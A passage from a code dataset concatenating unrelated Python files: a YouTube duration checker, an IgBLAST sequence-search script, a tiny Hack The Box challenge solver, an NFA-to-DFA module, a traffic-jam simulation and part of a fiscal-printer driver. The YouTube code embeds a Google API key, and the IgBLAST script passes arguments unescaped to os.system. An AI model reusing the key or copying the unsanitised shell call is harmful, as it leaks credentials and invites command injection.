\"https://www.googleapis.com/youtube/v3/videos?key=AIzaSyAAcI5ehq9HIGXpcpaRvFvrYgWk3aOUxJI&part=contentDetails&id=%s\" % video_id\n r = requests.get(request_url)\n if r.status_code is 200:\n duration = r.json()['items'][0]['contentDetails']['duration']\n dur = isodate.parse_duration(duration)\n return dur.total_seconds() <= globals.MAX_SONG_DURATION\n \n else:\n slack_utils.send_error_slack_message('Youtube api returned status code: %d on content details' % (r.status_code))\n","sub_path":"weeklyvibes/vibes/weekly_setup/youtube_tracks_getter.py","file_name":"youtube_tracks_getter.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"52238485","text":"import sys\nimport os\nimport argparse\n\n\n#==============================\ncurr_version = 1.0\nparser = argparse.ArgumentParser(\n description=\"This search TCR sequence in .\")\n\nparser.add_argument(\n \"--inpfile\", nargs=1, type=str, default=\"../test_tcr_human.txt\",#_nucleotide.fasta\",\n help=\"input file path.\")\nparser.add_argument(\n \"--outfile\", nargs=1, type=str, required=False, help=\"path to output data\"\n)\nparser.add_argument(\n \"--seqtype\", nargs=1, type=str, default=\"aminoacid\", help=\"nucleotide or aminoacid sequences?\")\nparser.add_argument(\n \"--specie\", nargs=1, type=str, default=\"HomoSapiens\", help=\"Specie name in CamelCase\")\n\nargs = parser.parse_args()\n\nif type(args.inpfile) is list:\n args.inpfile = args.inpfile[0]\ninpfile = args.inpfile\n\nif type(args.seqtype) is list:\n args.seqtype = args.seqtype[0]\nseq_type = args.seqtype\n\nif type(args.specie) is list:\n args.specie = args.specie[0]\nspecie = args.specie\n\nif args.outfile is not None:\n if type(args.outfile) is list:\n args.outfile = args.outfile[0]\n outfile = args.outfile\nelse:\n outfile = \".\".join(inpfile.split(\".\")[:-1])+\"_igblast_out.txt\"\n\nsegments = (\"Variable\", \"Diversity\", \"Joining\")\n\nworkdir = os.path.join(\"igblast_db\", specie.lower(), \"{}_{}_{}_sequences.fasta\".format(seq_type, specie, \"{}\"))\n\nv_db = workdir.format(\"Variable\")\nd_db = workdir.format(\"Diversity\")\nj_db = workdir.format(\"Joining\")\n\n\nif seq_type == \"nucleotide\":\n igblastcmd = \"/usr/local/ncbi/igblast/bin/igblastn\"\n blastcmd = \"blastn\"\n cmd = \"-germline_db_J {} -germline_db_D {} \".format(j_db, d_db)\nelif seq_type == \"aminoacid\":\n igblastcmd = \"/usr/local/ncbi/igblast/bin/igblastp\"\n blastcmd = \"blastp\"\n cmd = \"\"\nelse:\n sys.exit(1)\n\n\nblastcmd = \"{} -db {} -query {} -out {}\".format(blastcmd, j_db, inpfile, \"\")\n\ncmd = \"{} -germline_db_V {} {}-query {} -out {}\".format(igblastcmd, v_db, cmd, inpfile, outfile)\nprint(cmd)\nos.system(cmd)\n\n","sub_path":"ch_scripts/parse_tcr/igblast/igblast_seq.py","file_name":"igblast_seq.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"625989549","text":"import requests \nimport hashlib\n\n\nurl = \"http://docker.hackthebox.eu:49946\"\n\n\nsession = requests.Session()\nr = session.get(url)\nemdeeFive = r.text[167:187].encode('utf-8')\ndat = hashlib.md5(emdeeFive).hexdigest()\ndata = {'hash':dat} \nrequest = session.post(url,data)\n\nprint(request.text)\n","sub_path":"emdeeFiveForLife.py","file_name":"emdeeFiveForLife.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"639800303","text":"# coding=utf-8\nfrom __future__ import annotations\nfrom typing import List, Set, Any, Union, NoReturn\nimport string\n\nfrom utils import Epsilon\n\n__all__ = ('NFAState', 'NFA', 'DFAState', 'DFA')\n\n\nclass NFAState(object):\n count = 0\n\n def __init__(self):\n self.id = NFAState.count\n self.map = {}\n NFAState.count += 1\n\n def map_to(self, to: NFAState, ch: str) -> NoReturn:\n if self.map.get(ch) is None:\n self.map[ch] = {to}\n else:\n self.map[ch].add(to)\n\n def transfer(self, ch) -> Set[NFAState]:\n return self.map[ch]\n\n def __repr__(self):\n return f\"\"\n\n def __str__(self):\n return f\"S{self.id}\"\n\n def __hash__(self):\n return hash(id(self))\n\n\nclass NFA(object):\n def __init__(self):\n self.q0 = None\n self.states = set()\n self.accept_states = set()\n self.chars = string.printable\n\n def new_state(self) -> NFAState:\n q = NFAState()\n self.states.add(q)\n\n if self.q0 is None:\n self.q0 = q\n\n return q\n\n def accept(self, q: NFAState) -> NoReturn:\n self.accept_states.add(q)\n\n\nclass DFAState(object):\n count = 0\n\n def __init__(self):\n self.id = DFAState.count\n self.map = {}\n DFAState.count += 1\n\n def map_to(self, to: DFAState, ch: str) -> NoReturn:\n assert self.map.get(ch) is None\n self.map[ch] = to\n\n def transfer(self, ch) -> DFAState:\n return self.map[ch]\n\n def __repr__(self):\n return f\"\"\n\n def __str__(self):\n return f\"S{self.id}\"\n\n def __hash__(self):\n return hash(id(self))\n\n\nclass DFA(object):\n def __init__(self, frm: NFA = None):\n self.q0 = None\n self.states = set() # type: Set[DFAState]\n self.accept_states = set() # type: Set[DFAState]\n\n if frm is not None:\n self.build_from_NFA(frm)\n\n @staticmethod\n def possible_next_chars(states: Set[NFAState]) -> Set[Any]:\n ret = set()\n for state in states:\n ret.update(state.map.keys())\n ret.discard(Epsilon)\n return ret\n\n def build_from_NFA(self, nfa: NFA) -> NoReturn:\n self.q0 = self.new_state()\n self.states.add(self.q0)\n\n states = [self.epsilon_closure({nfa.q0})]\n dfa_states = [self.q0]\n\n total = 1\n current = 0\n\n while current < total:\n for ch in self.possible_next_chars(states[current]):\n new_states: Set[NFAState] = self.edge(states[current], ch)\n if new_states == set():\n continue # 如果是空集,直接跳过\n for i in range(total):\n if new_states == states[i]: # 如果该集合已存在\n dfa_states[current].map_to(dfa_states[i], ch)\n break\n else:\n states.append(new_states)\n new_dfa_state = self.new_state()\n dfa_states.append(new_dfa_state)\n dfa_states[current].map_to(new_dfa_state, ch)\n total += 1\n # 更新 DFA 的接受状态集\n for nfa_state in new_states:\n if nfa_state in nfa.accept_states:\n self.accept(new_dfa_state)\n break\n current += 1\n\n def epsilon_closure(self, states: Union[List[NFAState], Set[NFAState]]) \\\n -> Set[NFAState]:\n closure = set()\n for state in states:\n closure.add(state)\n temp_closure = state.map.get(Epsilon, None)\n if temp_closure is not None:\n closure.update(temp_closure)\n closure.update(self.epsilon_closure(temp_closure))\n return closure\n\n def edge(self, frm: Set[NFAState], ch: str) -> Set[NFAState]:\n to_states = set()\n for state in frm:\n temp_states = state.map.get(ch) # type: Set[NFAState]\n if temp_states is not None:\n to_states.update(temp_states)\n\n return self.epsilon_closure(to_states)\n\n def new_state(self) -> DFAState:\n q = DFAState()\n self.states.add(q)\n return q\n\n def accept(self, q: DFAState) -> NoReturn:\n self.accept_states.add(q)\n","sub_path":"Principle of Compiler (2019)/ProjectOLang/FA.py","file_name":"FA.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"316387565","text":"# Date: 11/30\n# Add reaction time after detecting gap_safe\n# Add car's object\n\nfrom vpython import *\nfrom math import cos, sin, pi\nimport random\nfrom random import seed\nseed(0)\nimport numpy as np\n\ndef km_to_m(x):\n\treturn x/3.6\n\ndef m_to_km(x):\n\treturn 3.6*x\n\ndef to_degree(x):\n\treturn x/circular_radius\n\ndef to_length(degree):\n\treturn degree*circular_radius\n\ndef set_initial_position(car_id):\n\treturn - interval*(car_id + (random.random()-0.5)*0.125*0.1)\n\ndef get_color(car_id = 0, speed = 0, use_speed_color = True):\n\tif use_speed_color:\n\t\tmax_speed = km_to_m(108)\n\t\tif speed < km_to_m(20): return vec(1, 0, 0)\n\t\telif speed < km_to_m(30): return vec(1, 0.5, 0)\n\t\telif speed < km_to_m(45): return vec(1, 1, 0)\n\t\telif speed < km_to_m(60): return vec(0.2, 1, 0.2)\n\t\telif speed < km_to_m(80): return vec(0, 1, 0.6)\n\t\telse: return vec(0, 0.5, 1)\t\n\telse:\n\t\tif car_id == 0: return color.red\n\t\telif car_id == 1: return color.green\n\t\telif car_id % 2: return color.yellow\n\t\telse: return color.blue\n\t\ndef output_situation(output_number = 4, output_ave_speed = True, output_speed = True, output_position = True, output_gap = True):\n\tprint(\"T = %.2f\" %t)\n\taverage_speed = m_to_km(np.mean(np.array([car.speed for car in cars])))\n\tif output_ave_speed: print('Average speed of all cars = %.2f (km/h)' %average_speed)\n\tif output_speed:\n\t\tprint('Speed(km/h) =', end = ' ')\n\t\tfor i in range(output_number): print(\"%.2f\" %m_to_km(cars[i].speed), end=\"\\t\")\n\t\tprint()\n\tif output_position:\n\t\tprint('Theta(degree)=', end = ' ')\n\t\tfor i in range(output_number): print(\"%.2f\" %((cars[i].theta)/2/pi*360), end=\"\\t\")\n\t\tprint()\n\tif output_gap:\n\t\tprint('Gap(m) =', end = ' ')\n\t\tfor i in range(output_number): print(\"%.2f\" %(cars[i].save_gap), end=\"\\t\")\n\t\tprint()\n\tprint('error_count =', error_count, '\\n')\n\nclass Cars_obj(sphere):\n\tdef __init__(self, car_id, version = 1):\n\t\tself.theta = set_initial_position(car_id) # initial position\n\t\tself.min_speed = 0 \t\t# (meter/sec)\n\t\tself.max_speed = km_to_m(108)\n\t\tself.max_accel = 0.3 \t\t# (meter/sec^2)\n\t\tself.max_decel = 3\n\t\tself.speed = random.gauss(mu = km_to_m(initial_mean_speed), sigma = km_to_m(initial_mean_speed)*0.125*0.2) # initial speed, gaussian distribution\n\t\t#self.speed = km_to_m(50) * (1 + (random.random()-0.5) * 0.5)\t# uniform distribution \n\t\t#self.compute_save_gap()\n\t\tsphere.__init__(self, pos = circular_radius * vec(cos(self.theta), sin(self.theta), 0), \n\t\t\t\t\t\tradius = 1.5, color = get_color(car_id, self.speed, use_speed_color)) # for car's visualization\n\t\t\nclass Cars_human_driver(Cars_obj):\n\tdef __init__(self, car_id, version = 1):\n\t\tsuper().__init__(car_id)\n\t\tif version == 1: # Eating\n\t\t\tself.decel = random.gauss(mu = 1.5, sigma = 1.5*0.125)\n\t\t\t#self.accel = random.gauss(mu = 0.15, sigma = 0.15*0.125)\n\t\t\tself.accel = self.decel * 0.5\n\t\t\tself.decel = min(max(0, self.decel), self.max_decel)\n\t\t\tself.accel = min(max(0, self.accel), self.max_decel * 0.5)\n\t\t\tself.reaction_time_accel = min(random.gauss(mu = 2.0, sigma = 2.0*0.125), max_idle_time) # max = 5 sec, default mu = 3\n\t\t\tself.reaction_time_decel = self.reaction_time_accel * 0.5\n\t\t\t#self.reaction_time_decel = random.gauss(mu = 1.5, sigma = 1.5*0.125)\n\t\telif version == 2: \n\t\t\tself.accel = random.gauss(mu = 0.3*9.8/2.0, sigma = 0.03*9.8)\n\t\t\tself.decel = random.gauss(mu = 0.5*9.8/2.0, sigma = 0.03*9.8)\n\t\t\tself.reaction_time_accel = random.gauss(mu = 2.5, sigma = 0.0) # 設定成 dt 的話表示不會發呆,設成零可能會有 error\n\t\t\tself.reaction_time_decel = random.gauss(mu = 2.5, sigma = 0.0)\n\n\tdef compute_save_gap(self):\n\t\tself.save_gap = max(2*self.speed, min_gap)\n\t\treturn self.save_gap\n\t\t\nclass Autonomous_connected_cars(Cars_obj):\n\tdef __init__(self, car_id, is_connected, version = 1):\n\t\tsuper().__init__(car_id)\n\t\tif version == 1:\n\t\t\tself.accel = self.max_accel # can modify this value in the future\n\t\t\tself.decel = self.max_decel\n\t\t\tif is_connected == False:\n\t\t\t\tself.reaction_time_accel = 0.5\n\t\t\t\tself.reaction_time_decel = 0.5\n\t\t\telse: \n\t\t\t\tself.reaction_time_accel = 0.1\n\t\t\t\tself.reaction_time_decel = 0.1\n\t\t\t\n\tdef compute_save_gap(self, speed_front):\n\t\treturn 0.1*self.speed + self.speed**2/2.0/self.decel - speed_front**2/2.0/self.decel + min_gap\n\t\t# this equation is not all correct\n\t\t\n# global variable settings\nglobal_version = 2 \t\t\t\ncars_variable_version = 1 \t\ncars_settings_list = ['human', 'auto', 'auto+is_connected']\ncars_settings = cars_settings_list[2]\nif cars_settings == 'human':\n\tis_autonomous = False\n\tis_connected = False\nelif cars_settings == 'auto':\n\tis_autonomous = True\n\tis_connected = False\nelif cars_settings == 'auto+is_connected':\n\tis_autonomous = True\n\tis_connected = True\n\nmin_gap = 5 \t\t\t\t# distance between two cars cannot less than min_gap\ndt = 0.002\nt = 0\n\nif not is_autonomous: max_idle_time = 5 \t\t\t# 最多發呆五秒\nelif not is_connected: max_idle_time = 1\nelif is_connected: max_idle_time = 1\ninitial_mean_speed = 40 \t# here! (km/hr)\nremove_error_speed = km_to_m(15)\nnot_jam_speed = km_to_m(20) \nuse_speed_color = True \n\nif global_version == 1:\t\t# default setting\n\tnum_cars = 22 \t\t\t# at least 2\n\tcircular_radius = 230/2.0/pi \nelif global_version == 2:\t# better visiualization setting\n\tnum_cars = 20\t\t\t# at least 2\n\tcircular_radius = 400/2.0/pi \n\tdt = 0.004\nelif global_version == 3: # you can do experiment here\n\tnum_cars = 22 \t\t\t# at least 2\n\tcircular_radius = 230/2.0/pi \n\n# For human drivers\nif not is_autonomous or True:\n\tnext_action = np.zeros([num_cars, int(max_idle_time/dt)], dtype = np.int8)\n\tprint('next_action =', next_action.shape) \n\t# 1 for accel, -1 for decel, 0 for nothing\n\t# pull in front, and push in the end\n\n# visualization\nscene = canvas(background = vec(0.4, 0.7, 0.7), width = 1200, height = 800)\npath = cylinder(pos = vec(0, 0, -circular_radius*0.025), axis = vec(0, 0, -circular_radius*0.05), radius = circular_radius * 1.05, color = vec(0.1, 0.2, 0.2))\npark = cylinder(pos = vec(0, 0, -circular_radius*0.025+0.1), axis = vec(0, 0, -circular_radius*0.052), radius = circular_radius * 0.95, color = vec(0.4, 0.7, 0.7))\nmsg = text(text = 'Number of cars = %d\\nLength of circular = %d(m)' % (num_cars, circular_radius*2*pi), pos = vec(-18, 0, 0), height = 3) # here!\nerror_count = 0\n\ncars = []\ninterval = 2*pi/float(num_cars)\nprint(\"interval = %.3f, %.3f\" %(interval, interval*circular_radius))\nif not is_autonomous:\n\tfor i in range(num_cars): cars.append(Cars_human_driver(i))\nelse:\n\tfor i in range(num_cars): cars.append(Autonomous_connected_cars(i, is_connected))\n\tspeed_front = [0 for i in range(num_cars)]\n\tprint('reaction time =', cars[1].reaction_time_decel, cars[1].reaction_time_accel)\n\nwhile True:\n\trate(1/dt)\n\tnext_action[:, :-1] = np.copy(next_action[:, 1:]) # update next action array\n\t\n\tfor i in range(num_cars):\n\t\tif is_autonomous:\n\t\t\tif i != 0: speed_front[i] = cars[i-1].speed\n\t\t\telse: speed_front[i] = cars[num_cars-1].speed\n\t\t\tcars[i].save_gap = cars[i].compute_save_gap(speed_front[i])\n\t\telse:\n\t\t\tcars[i].save_gap = cars[i].compute_save_gap()\n\t\tif i != 0: current_gap = abs(cars[i-1].theta - cars[i].theta)*circular_radius\n\t\telse: current_gap = abs(cars[num_cars-1].theta + 2*pi - cars[0].theta)*circular_radius\n\t\t\n\t\tif current_gap < min_gap: \t\t\t\t\t# warning \n\t\t\t#cars[i].speed = 0 \t\t\t\t\t\t\n\t\t\tcars[i].speed = cars[i].speed * 0.99 \t\n\t\t\tif i != 0: cars[i].theta = cars[i-1].theta - to_degree(min_gap)\n\t\t\telse: cars[0].theta = cars[num_cars-1].theta - to_degree(min_gap) + 2*pi\n\t\t\tnext_action[i, :] *= 0 \t\t\t\t\t# reset next_action\n\t\t\tcars[i].color = color.white\n\t\t\terror_count += 1\n\t\telse:\n\t\t\tif current_gap < cars[i].save_gap: \n\t\t\t\tnext_action[i][int(cars[i].reaction_time_decel/dt)] = -1\n\t\t\t\tnext_action[i][int(cars[i].reaction_time_decel/dt)+1:] *= 0 \t\t# reset to zero if new action interupt\n\t\t\telse: \n\t\t\t\tnext_action[i][int(cars[i].reaction_time_accel/dt)] = 1\n\t\t\t\tnext_action[i][int(cars[i].reaction_time_accel/dt)+1:] *= 0\n\t\t\tif next_action[i][0] == 1: cars[i].speed = cars[i].speed + cars[i].accel*dt\n\t\t\telif next_action[i][0] == -1: cars[i].speed = cars[i].speed - cars[i].decel*dt\n\t\t\tcars[i].speed = min(cars[i].max_speed, max(cars[i].min_speed, cars[i].speed)) # min_max clip\n\t\t\tcars[i].theta = cars[i].theta + to_degree(cars[i].speed * dt)\n\t\t\tif cars[i].speed > remove_error_speed: cars[i].color = get_color(i, cars[i].speed, use_speed_color)\n\t\tcars[i].pos = vec(circular_radius*cos(cars[i].theta), circular_radius*sin(cars[i].theta), 0)\n\t\n\tt += 1\n\tif t % 3000 == 0: \n\t\toutput_situation(output_number = min(4, num_cars))\n\t\t\n","sub_path":"demo_traffic_jam.py","file_name":"demo_traffic_jam.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"223394534","text":"# -*- coding: utf-8 -*-\n\nimport ctypes\nimport sys\nimport json\nimport datetime\nimport os\nimport platform\nif platform.system() == 'Windows':\n from _winreg import *\n\nif sys.version_info[0] == 3:\n RANGE = range\n TEXT = str\nelse:\n TEXT = basestring\n RANGE = xrange\n\n\nclass IFptr(object):\n (\n LIBFPTR_PARAM_TEXT,\n LIBFPTR_PARAM_TEXT_WRAP,\n LIBFPTR_PARAM_ALIGNMENT,\n LIBFPTR_PARAM_FONT,\n LIBFPTR_PARAM_FONT_DOUBLE_WIDTH,\n LIBFPTR_PARAM_FONT_DOUBLE_HEIGHT,\n LIBFPTR_PARAM_LINESPACING,\n LIBFPTR_PARAM_BRIGHTNESS,\n LIBFPTR_PARAM_MODEL,\n LIBFPTR_PARAM_RECEIPT_TYPE,\n LIBFPTR_PARAM_REPORT_TYPE,\n LIBFPTR_PARAM_MODE,\n LIBFPTR_PARAM_EXTERNAL_DEVICE_TYPE,\n LIBFPTR_PARAM_EXTERNAL_DEVICE_DATA,\n LIBFPTR_PARAM_FREQUENCY,\n LIBFPTR_PARAM_DURATION,\n LIBFPTR_PARAM_CUT_TYPE,\n LIBFPTR_PARAM_DRAWER_ON_TIMEOUT,\n LIBFPTR_PARAM_DRAWER_OFF_TIMEOUT,\n LIBFPTR_PARAM_DRAWER_ON_QUANTITY,\n LIBFPTR_PARAM_TIMEOUT_ENQ,\n LIBFPTR_PARAM_COMMAND_BUFFER,\n LIBFPTR_PARAM_ANSWER_BUFFER,\n LIBFPTR_PARAM_SERIAL_NUMBER,\n LIBFPTR_PARAM_MANUFACTURER_CODE,\n LIBFPTR_PARAM_NO_NEED_ANSWER,\n LIBFPTR_PARAM_INFO_DISCOUNT_SUM,\n LIBFPTR_PARAM_USE_ONLY_TAX_TYPE,\n LIBFPTR_PARAM_PAYMENT_TYPE,\n LIBFPTR_PARAM_PAYMENT_SUM,\n LIBFPTR_PARAM_REMAINDER,\n LIBFPTR_PARAM_CHANGE,\n LIBFPTR_PARAM_DEPARTMENT,\n LIBFPTR_PARAM_TAX_TYPE,\n LIBFPTR_PARAM_TAX_SUM,\n LIBFPTR_PARAM_TAX_MODE,\n LIBFPTR_PARAM_RECEIPT_ELECTRONICALLY,\n LIBFPTR_PARAM_USER_PASSWORD,\n LIBFPTR_PARAM_SCALE,\n LIBFPTR_PARAM_LEFT_MARGIN,\n LIBFPTR_PARAM_BARCODE,\n LIBFPTR_PARAM_BARCODE_TYPE,\n LIBFPTR_PARAM_BARCODE_PRINT_TEXT,\n LIBFPTR_PARAM_BARCODE_VERSION,\n LIBFPTR_PARAM_BARCODE_CORRECTION,\n LIBFPTR_PARAM_BARCODE_COLUMNS,\n LIBFPTR_PARAM_BARCODE_INVERT,\n LIBFPTR_PARAM_HEIGHT,\n LIBFPTR_PARAM_WIDTH,\n LIBFPTR_PARAM_FILENAME,\n LIBFPTR_PARAM_PICTURE_NUMBER,\n LIBFPTR_PARAM_DATA_TYPE,\n LIBFPTR_PARAM_OPERATOR_ID,\n LIBFPTR_PARAM_LOGICAL_NUMBER,\n LIBFPTR_PARAM_DATE_TIME,\n LIBFPTR_PARAM_FISCAL,\n LIBFPTR_PARAM_SHIFT_STATE,\n LIBFPTR_PARAM_CASHDRAWER_OPENED,\n LIBFPTR_PARAM_RECEIPT_PAPER_PRESENT,\n LIBFPTR_PARAM_COVER_OPENED,\n LIBFPTR_PARAM_SUBMODE,\n LIBFPTR_PARAM_RECEIPT_NUMBER,\n LIBFPTR_PARAM_DOCUMENT_NUMBER,\n LIBFPTR_PARAM_SHIFT_NUMBER,\n LIBFPTR_PARAM_RECEIPT_SUM,\n LIBFPTR_PARAM_RECEIPT_LINE_LENGTH,\n LIBFPTR_PARAM_RECEIPT_LINE_LENGTH_PIX,\n LIBFPTR_PARAM_MODEL_NAME,\n LIBFPTR_PARAM_UNIT_VERSION,\n LIBFPTR_PARAM_PRINTER_CONNECTION_LOST,\n LIBFPTR_PARAM_PRINTER_ERROR,\n LIBFPTR_PARAM_CUT_ERROR,\n LIBFPTR_PARAM_PRINTER_OVERHEAT,\n LIBFPTR_PARAM_UNIT_TYPE,\n LIBFPTR_PARAM_LICENSE_NUMBER,\n LIBFPTR_PARAM_LICENSE_ENTERED,\n LIBFPTR_PARAM_LICENSE,\n LIBFPTR_PARAM_SUM,\n LIBFPTR_PARAM_COUNT,\n LIBFPTR_PARAM_COUNTER_TYPE,\n LIBFPTR_PARAM_STEP_COUNTER_TYPE,\n LIBFPTR_PARAM_ERROR_TAG_NUMBER,\n LIBFPTR_PARAM_TABLE,\n LIBFPTR_PARAM_ROW,\n LIBFPTR_PARAM_FIELD,\n LIBFPTR_PARAM_FIELD_VALUE,\n LIBFPTR_PARAM_FN_DATA_TYPE,\n LIBFPTR_PARAM_TAG_NUMBER,\n LIBFPTR_PARAM_TAG_VALUE,\n LIBFPTR_PARAM_DOCUMENTS_COUNT,\n LIBFPTR_PARAM_FISCAL_SIGN,\n LIBFPTR_PARAM_DEVICE_FFD_VERSION,\n LIBFPTR_PARAM_FN_FFD_VERSION,\n LIBFPTR_PARAM_FFD_VERSION,\n LIBFPTR_PARAM_CHECK_SUM,\n LIBFPTR_PARAM_COMMODITY_NAME,\n LIBFPTR_PARAM_PRICE,\n LIBFPTR_PARAM_QUANTITY,\n LIBFPTR_PARAM_POSITION_SUM,\n LIBFPTR_PARAM_FN_TYPE,\n LIBFPTR_PARAM_FN_VERSION,\n LIBFPTR_PARAM_REGISTRATIONS_REMAIN,\n LIBFPTR_PARAM_REGISTRATIONS_COUNT,\n LIBFPTR_PARAM_NO_ERROR_IF_NOT_SUPPORTED,\n LIBFPTR_PARAM_OFD_EXCHANGE_STATUS,\n LIBFPTR_PARAM_FN_ERROR_DATA,\n LIBFPTR_PARAM_FN_ERROR_CODE,\n LIBFPTR_PARAM_ENVD_MODE,\n LIBFPTR_PARAM_DOCUMENT_CLOSED,\n LIBFPTR_PARAM_JSON_DATA,\n LIBFPTR_PARAM_COMMAND_SUBSYSTEM,\n LIBFPTR_PARAM_FN_OPERATION_TYPE,\n LIBFPTR_PARAM_FN_STATE,\n LIBFPTR_PARAM_ENVD_MODE_ENABLED,\n LIBFPTR_PARAM_SETTING_ID,\n LIBFPTR_PARAM_SETTING_VALUE,\n LIBFPTR_PARAM_MAPPING_KEY,\n LIBFPTR_PARAM_MAPPING_VALUE,\n LIBFPTR_PARAM_COMMODITY_PIECE,\n LIBFPTR_PARAM_POWER_SOURCE_TYPE,\n LIBFPTR_PARAM_BATTERY_CHARGE,\n LIBFPTR_PARAM_VOLTAGE,\n LIBFPTR_PARAM_USE_BATTERY,\n LIBFPTR_PARAM_BATTERY_CHARGING,\n LIBFPTR_PARAM_CAN_PRINT_WHILE_ON_BATTERY,\n LIBFPTR_PARAM_MAC_ADDRESS,\n LIBFPTR_PARAM_FN_FISCAL,\n LIBFPTR_PARAM_NETWORK_ERROR,\n LIBFPTR_PARAM_OFD_ERROR,\n LIBFPTR_PARAM_FN_ERROR,\n LIBFPTR_PARAM_COMMAND_CODE,\n LIBFPTR_PARAM_PRINTER_TEMPERATURE,\n LIBFPTR_PARAM_RECORDS_TYPE,\n LIBFPTR_PARAM_OFD_FISCAL_SIGN,\n LIBFPTR_PARAM_HAS_OFD_TICKET,\n LIBFPTR_PARAM_NO_SERIAL_NUMBER,\n LIBFPTR_PARAM_RTC_FAULT,\n LIBFPTR_PARAM_SETTINGS_FAULT,\n LIBFPTR_PARAM_COUNTERS_FAULT,\n LIBFPTR_PARAM_USER_MEMORY_FAULT,\n LIBFPTR_PARAM_SERVICE_COUNTERS_FAULT,\n LIBFPTR_PARAM_ATTRIBUTES_FAULT,\n LIBFPTR_PARAM_FN_FAULT,\n LIBFPTR_PARAM_INVALID_FN,\n LIBFPTR_PARAM_HARD_FAULT,\n LIBFPTR_PARAM_MEMORY_MANAGER_FAULT,\n LIBFPTR_PARAM_SCRIPTS_FAULT,\n LIBFPTR_PARAM_FULL_RESET,\n LIBFPTR_PARAM_WAIT_FOR_REBOOT,\n LIBFPTR_PARAM_SCALE_PERCENT,\n LIBFPTR_PARAM_FN_NEED_REPLACEMENT,\n LIBFPTR_PARAM_FN_RESOURCE_EXHAUSTED,\n LIBFPTR_PARAM_FN_MEMORY_OVERFLOW,\n LIBFPTR_PARAM_FN_OFD_TIMEOUT,\n LIBFPTR_PARAM_FN_CRITICAL_ERROR,\n LIBFPTR_PARAM_OFD_MESSAGE_READ,\n LIBFPTR_PARAM_DEVICE_MIN_FFD_VERSION,\n LIBFPTR_PARAM_DEVICE_MAX_FFD_VERSION,\n LIBFPTR_PARAM_DEVICE_UPTIME,\n LIBFPTR_PARAM_NOMENCLATURE_TYPE,\n LIBFPTR_PARAM_GTIN,\n LIBFPTR_PARAM_FN_DOCUMENT_TYPE,\n LIBFPTR_PARAM_NETWORK_ERROR_TEXT,\n LIBFPTR_PARAM_FN_ERROR_TEXT,\n LIBFPTR_PARAM_OFD_ERROR_TEXT,\n LIBFPTR_PARAM_USER_SCRIPT_ID,\n LIBFPTR_PARAM_USER_SCRIPT_PARAMETER,\n LIBFPTR_PARAM_USER_MEMORY_OPERATION,\n LIBFPTR_PARAM_USER_MEMORY_DATA,\n LIBFPTR_PARAM_USER_MEMORY_STRING,\n LIBFPTR_PARAM_USER_MEMORY_ADDRESS,\n LIBFPTR_PARAM_FN_PRESENT,\n LIBFPTR_PARAM_BLOCKED,\n LIBFPTR_PARAM_DOCUMENT_PRINTED,\n LIBFPTR_PARAM_DISCOUNT_SUM,\n LIBFPTR_PARAM_SURCHARGE_SUM,\n LIBFPTR_PARAM_LK_USER_CODE,\n LIBFPTR_PARAM_LICENSE_COUNT,\n LIBFPTR_PARAM_DEFER,\n LIBFPTR_PARAM_CAP_54FZ,\n LIBFPTR_PARAM_CAP_MANUAL_CLICHE_CONTROL,\n ) = RANGE(65536, 65717)\n\n (\n LIBFPTR_OK,\n LIBFPTR_ERROR_CONNECTION_DISABLED,\n LIBFPTR_ERROR_NO_CONNECTION,\n LIBFPTR_ERROR_PORT_BUSY,\n LIBFPTR_ERROR_PORT_NOT_AVAILABLE,\n LIBFPTR_ERROR_INCORRECT_DATA,\n LIBFPTR_ERROR_INTERNAL,\n LIBFPTR_ERROR_UNSUPPORTED_CAST,\n LIBFPTR_ERROR_NO_REQUIRED_PARAM,\n LIBFPTR_ERROR_INVALID_SETTINGS,\n LIBFPTR_ERROR_NOT_CONFIGURED,\n LIBFPTR_ERROR_NOT_SUPPORTED,\n LIBFPTR_ERROR_INVALID_MODE,\n LIBFPTR_ERROR_INVALID_PARAM,\n LIBFPTR_ERROR_NOT_LOADED,\n LIBFPTR_ERROR_UNKNOWN,\n LIBFPTR_ERROR_INVALID_SUM,\n LIBFPTR_ERROR_INVALID_QUANTITY,\n LIBFPTR_ERROR_CASH_COUNTER_OVERFLOW,\n LIBFPTR_ERROR_LAST_OPERATION_STORNO_DENIED,\n LIBFPTR_ERROR_STORNO_BY_CODE_DENIED,\n LIBFPTR_ERROR_LAST_OPERATION_NOT_REPEATABLE,\n LIBFPTR_ERROR_DISCOUNT_NOT_REPEATABLE,\n LIBFPTR_ERROR_DISCOUNT_DENIED,\n LIBFPTR_ERROR_INVALID_COMMODITY_CODE,\n LIBFPTR_ERROR_INVALID_COMMODITY_BARCODE,\n LIBFPTR_ERROR_INVALID_COMMAND_FORMAT,\n LIBFPTR_ERROR_INVALID_COMMAND_LENGTH,\n LIBFPTR_ERROR_BLOCKED_IN_DATE_INPUT_MODE,\n LIBFPTR_ERROR_NEED_DATE_ACCEPT,\n LIBFPTR_ERROR_NO_MORE_DATA,\n LIBFPTR_ERROR_NO_ACCEPT_OR_CANCEL,\n LIBFPTR_ERROR_BLOCKED_BY_REPORT_INTERRUPTION,\n LIBFPTR_ERROR_DISABLE_CASH_CONTROL_DENIED,\n LIBFPTR_ERROR_MODE_BLOCKED,\n LIBFPTR_ERROR_CHECK_DATE_TIME,\n LIBFPTR_ERROR_DATE_TIME_LESS_THAN_FS,\n LIBFPTR_ERROR_CLOSE_ARCHIVE_DENIED,\n LIBFPTR_ERROR_COMMODITY_NOT_FOUND,\n LIBFPTR_ERROR_WEIGHT_BARCODE_WITH_INVALID_QUANTITY,\n LIBFPTR_ERROR_RECEIPT_BUFFER_OVERFLOW,\n LIBFPTR_ERROR_QUANTITY_TOO_FEW,\n LIBFPTR_ERROR_STORNO_TOO_MUCH,\n LIBFPTR_ERROR_BLOCKED_COMMODITY_NOT_FOUND,\n LIBFPTR_ERROR_NO_PAPER,\n LIBFPTR_ERROR_COVER_OPENED,\n 